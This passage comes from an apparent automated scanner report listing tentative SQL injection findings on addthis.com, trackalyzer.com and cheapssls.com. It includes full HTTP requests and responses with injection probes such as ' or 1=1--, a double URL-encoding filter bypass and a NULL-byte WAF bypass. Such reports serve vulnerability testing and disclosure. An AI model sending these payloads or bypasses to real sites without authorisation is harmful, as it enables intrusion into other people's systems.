Set-Cookie: sglst=41bb00v00t044m9w00arr9w00dnh9u303td9w00arp9u30f7u9u307219w000kn9w00a6p9w005m39w005m29u305no9u30dsb9w00cnw9w00esh9w00cnu9u30gol9u30esg9u30ctn9u308nc9w00ebb9w00ctp9w00cro9w004qk9u30h9v9u30dzq9u30bow9u304wb9w00dzt9w001bi030ag29w008dy9w000td9w0; Domain=media6degrees.com; Expires=Thu, 01-Mar-2012 17:32:49 GMT; Path=/
Set-Cookie: rdrlst=41l0sh6lqyjef0000001i6u1i0m79lqyjec000000206u200xv3lqyjec0000001z6u1z0m7dlqyjee0000001p6u1p16pilqyjea000000296u290x18lqyjee0000001q6u1q18ldlqyjeb000000286u280moulqyjee0000001o6u1o0moqlqyjeb000000236u2318etlqyjea000000296u290dhxlqyjea000000296u2918lqlqyjea0000002a6u2a14hnlqyjea000000296u2914khlqyjea000000296u291196lqyjea0000002d6u2d1195lqyjea0000002e6u2e1194lqyje90000002f6u2f00c1lqyjee0000001q6u1q1193lqyje90000002g6u2g1axvlqyjee0000001m6u1m1192lqyje70000002m6u2m10tylqyje90000002h6u2h0cablqyjee0000001q6u1q06pblqyjee0000001q6u1q07sylqyjee0000001q6u1q18w4lqyjef0000001l6u1l10telqyje80000002i6u2i16d5lqyjee0000001q6u1q159elqyjee0000001n6u1n10rdlqyje80000002j6u2j0m3zlqyjec000000216u210miwlqyjec000000226u221ad8lqyje80000002k6u2k18k9lqyjeb000000276u270m0slqyjee0000001r6u1r0m43lqyjed0000001s6u1s0m0olqyjeb000000246u241679lqyjed0000001t6u1t12qnlqyje70000002l6u2l0mjdlqyjeb000000256u250mjhlqyjed0000001u6u1u1671lqyjeb000000266u260lw4lqyjea000000296u290lm1lqyjed0000001v6u1v0rzglqyjef0000001j6u1j18kzlqyjea0000002b6u2b17gxlqyjea000000296u290lm5lqyjed0000001w6u1w0lltlqyjec0000001x6u1x0zpelqyjea000000296u290llxlqyjec0000001y6u1y18knlqyjea0000002c6u2c18hblqyjef0000001k6u1k0afolqyjee0000001q6u1q0kkjlqyjee0000001q6u1q14b
...[SNIP]...

1.2. http://ds.addthis.com/red/psi/sites/vasco.com/p.json [uit cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ds.addthis.com
Path:   /red/psi/sites/vasco.com/p.json

Issue detail

The uit cookie appears to be vulnerable to SQL injection attacks. The payloads 97382001'%20or%201%3d1--%20 and 97382001'%20or%201%3d2--%20 were each submitted in the uit cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /red/psi/sites/vasco.com/p.json?callback=_ate.ad.hpr&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fpress_room%2Fnews_archive%2F2011%2Fnews_diginotar_reports_security_incident.aspx&ref=http%3A%2F%2Fvasco.com%2F&1wh4476 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; di=%7B%7D..1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; psc=4; uid=4e5e3f1ae3fd7427; uvc=17|35; uit=197382001'%20or%201%3d1--%20

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 03 Sep 2011 17:32:34 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03 Oct 2011 17:32:34 GMT; Path=/
Set-Cookie: di=%7B%7D..1315071154.10R|1315071154.1FE|1315071154.1OD|1315071154.60|1315071154.1EY; Domain=.addthis.com; Expires=Mon, 02-Sep-2013 17:32:21 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 03 Sep 2011 17:32:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 03 Sep 2011 17:32:34 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

Request 2

GET /red/psi/sites/vasco.com/p.json?callback=_ate.ad.hpr&uid=4e5e3f1ae3fd7427&url=http%3A%2F%2Fvasco.com%2Fcompany%2Fpress_room%2Fnews_archive%2F2011%2Fnews_diginotar_reports_security_incident.aspx&ref=http%3A%2F%2Fvasco.com%2F&1wh4476 HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh52.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; di=%7B%7D..1314983342.10R|1314983342.1FE|1314983342.1OD|1314983342.60|1314983342.1EY; psc=4; uid=4e5e3f1ae3fd7427; uvc=17|35; uit=197382001'%20or%201%3d2--%20

Response 2

HTTP/1.1 500 Internal Server Error
Server: Apache-Coyote/1.1
Content-Length: 157
Content-Type: text/html
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sat, 03 Sep 2011 17:32:34 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 03 Oct 2011 17:32:34 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sat, 03 Sep 2011 17:32:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 03 Sep 2011 17:32:34 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

1.3. http://t4.trackalyzer.com/trackalyze.asp [i parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://t4.trackalyzer.com
Path:   /trackalyze.asp

Issue detail

The i parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the i parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /trackalyze.asp?r=None&p=http%3A//vasco.com/&i=10538' HTTP/1.1
Host: t4.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=283117088618558

Response 1

HTTP/1.1 500 Internal Server Error
Server: Microsoft-IIS/5.0
Date: Sat, 03 Sep 2011 17:33:13 GMT
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Content-Length: 270
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fvasco%2Ecom%2F; expires=Sun, 04-Sep-2011 07:00:00 GMT; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft VBScript runtime </font> <font face="Arial" size=2>error '800a000d'</font>
<p>
<font face="Arial" size=2>Type mismatch: 'cint'</font>
<p>
<font face="Arial" si
...[SNIP]...

Request 2

GET /trackalyze.asp?r=None&p=http%3A//vasco.com/&i=10538'' HTTP/1.1
Host: t4.trackalyzer.com
Proxy-Connection: keep-alive
Referer: http://vasco.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: trackalyzer=283117088618558

Response 2

HTTP/1.1 302 Object moved
Server: Microsoft-IIS/5.0
Date: Sat, 03 Sep 2011 17:33:14 GMT
P3P: policyref="http://trackalyzer.com/w3c/p3p.xml", CP="NON DSP COR CURa OUR NOR"
Location: http://t4.trackalyzer.com/0.gif
Content-Length: 152
Content-Type: text/html
Set-Cookie: loop=http%3A%2F%2Fvasco%2Ecom%2F; expires=Sun, 04-Sep-2011 07:00:00 GMT; path=/
Cache-control: private

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://t4.trackalyzer.com/0.gif">here</a>.</body>

1.4. http://www.cheapssls.com/index.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php'?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:55:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:00 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php''?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/premiumssl.html
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:02 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:02 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.5. http://www.cheapssls.com/index.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q='
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:29 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=1c2uhdfvhbepsaec7mkm3aing7; expires=Sat, 17-Sep-2011 21:55:29 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:55:29 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:28 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=''
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:30 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:30 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.6. http://www.cheapssls.com/index.php [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:54:18 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:54:18 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:54:17 GMT
Content-Length: 1048

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': { '5b91fafac406f3f976c0427201da50c5': {
...[SNIP]...

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=%2527%2527
Content-Length: 747
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgCurrentDomain=www.cheapssls.com; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.4.7.1315085424; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1; stat_uniq_code=134386

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpremiumssl.html&ve%5Btitle%5D=PremiumSSL+Certificates.+Premium+SSLs+from+Comodo+as+low+as+%2475%2Fyear&ve%5Bbrowser_version%5D=13
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:54:53 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:54:53 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.7. http://www.cheapssls.com/index.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1%00'
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:05 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
Set-Cookie: sess_id=ncc9kj9io45uoj9fi65bo55df5; expires=Sat, 17-Sep-2011 21:55:05 GMT; path=/; domain=.cheapssls.com
Set-Cookie: stat_uniq_code=134386+and+2%3D2--+; expires=Sun, 02-Sep-2012 21:55:05 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:04 GMT
Content-Length: 168

{text: '<p><b><span style=\'font-weight: bold; color: #000000; font-size: 13px; font-family: Courier;\'>Error occured</span></b><br>', data : { 'notifications': [ ] }}

Request 2

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/comodo-ssl-certificates/positivessl.html
Content-Length: 758
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1%00''
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess_id=ne5f0cvav2ksnju7kcgcpstck3; sgTrackerUserId=110903163028554%3A%3Asga; sgLastVisitPublic=Sat%20Sep%2003%202011%2016%3A30%3A28%20GMT-0500%20%28Central%20Daylight%20Time%29; stat_uniq_code=134386; sgCurrentDomain=www.cheapssls.com; __utma=207162305.1887707563.1315085424.1315085424.1315085424.1; __utmb=207162305.8.6.1315085433813; __utmc=207162305; __utmz=207162305.1315085424.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates; __utmv=207162305.|5=sgAnonymousUsers=110903163028554=1

ve%5Burl%5D=http%3A%2F%2Fwww.cheapssls.com%2Fcomodo-ssl-certificates%2Fpositivessl.html&ve%5Btitle%5D=Comodo+PositiveSSL+Certificates.+Positive+SSL+from+Comodo+as+low+as+%248.00%2Fyear&ve%5Bbrowser_ve
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: application/json
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sat, 03 Sep 2011 21:55:07 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.5
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:55:08 GMT
Content-Length: 44

{text: '', data : { 'notifications': [ ] }}

1.8. http://www.cheapssls.com/index.php [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.cheapssls.com
Path:   /index.php

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /index.php?dispatch=statistics.collect HTTP/1.1
Host: www.cheapssls.com
Proxy-Connection: keep-alive
Referer: http://www.cheapssls.com/geotrust-ssl-certificates/quickssl-premium.html
Content-Length: 791
Origin: http://www.cheapssls.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1'
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
